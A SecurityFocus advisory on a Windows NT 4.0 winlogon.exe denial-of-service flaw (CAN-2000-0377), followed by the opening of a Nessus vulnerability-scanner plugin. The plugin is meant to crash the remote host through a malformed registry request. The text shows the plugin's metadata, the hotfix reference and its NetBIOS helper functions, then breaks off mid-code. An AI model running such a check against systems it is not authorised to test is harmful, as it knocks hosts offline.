source: https://www.securityfocus.com/bid/1331/info In special circumstances while handling requests to access the Remote Registry Server, Windows NT 4.0 can crash due to winlogon.exe's inability to process specially malformed remote registry requests. Rebooting the machine would be required in order to regain normal functionality. Only authenticated users on the network would be able to exploit this vulnerability. If Windows NT was configured to deny all remote registry requests, it would not be affected by this vulnerability under any conditions. # # This script was written by Renaud Deraison # # See the Nessus Scripts License for details # if(description) { script_id(10414); script_cve_id("CAN-2000-0377"); name["english"] = "WinLogon.exe DoS"; name["francais"] = "Dini de service WinLogon.exe"; script_name(english:name["english"], francais:name["francais"]); desc["english"] = " It seems that is was possible to crash remotely winlogon.exe by sending a malformed request to access the registry of the remote host. As soon as you validate the error box, the host will reboot. Solution : apply hotfix Q264684 Risk factor : High See also : http://www.microsoft.com/technet/security/bulletin/ms00-040.asp"; desc["francais"] = " Il semble qu'il ait iti possible de faire planter le programme WinLogon.exe en lui envoyant une requhte mal formie pour accider ` sa base de registres. Dhs que vous validerez la boite de dialogue, l'hote distant redimarrera. Solution : appliquez le hotfix Q264684 Facteur de risque : Elevi Voir aussi : http://www.microsoft.com/technet/security/bulletin/ms00-040.asp"; script_description(english:desc["english"], francais:desc["francais"]); summary["english"] = "crashes winlogon.exe"; summary["francais"] = "fait planter winlogon.exe"; script_summary(english:summary["english"], francais:summary["francais"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison"); family["english"] = "Denial of Service"; family["francais"] = "Dini de service"; script_family(english:family["english"], francais:family["francais"]); script_dependencies("netbios_name_get.nasl", "smb_login.nasl"); script_require_keys("SMB/name", "SMB/login", "SMB/password"); script_require_ports(139); exit(0); } #-----------------------------------------------------------------# # Convert a netbios name to the netbios network format # #-----------------------------------------------------------------# function netbios_name(orig) { ret = ""; len = strlen(orig); for(i=0;i<16;i=i+1) { if(i >= len) { c = "CA"; } else { o = ord(orig[i]); odiv = o/16; odiv = odiv + ord("A"); omod = o%16; omod = omod + ord("A"); c = raw_string(odiv, omod); } ret = ret+c; } return(ret); } #--------------------------------------------------------------# # Returns the netbios name of a redirector # #--------------------------------------------------------------# function netbios_redirector_name() { ret = crap(data:"CA", length:30); ret = ret+"AA"; return(ret); } #-------------------------------------------------------------# # return a 28 + strlen(data) + (odd(data)?0:1) long string # #-------------------------------------------------------------# function unicode(data) { len = strlen(data); ret = raw_string(ord(data[0])); for(i=1;i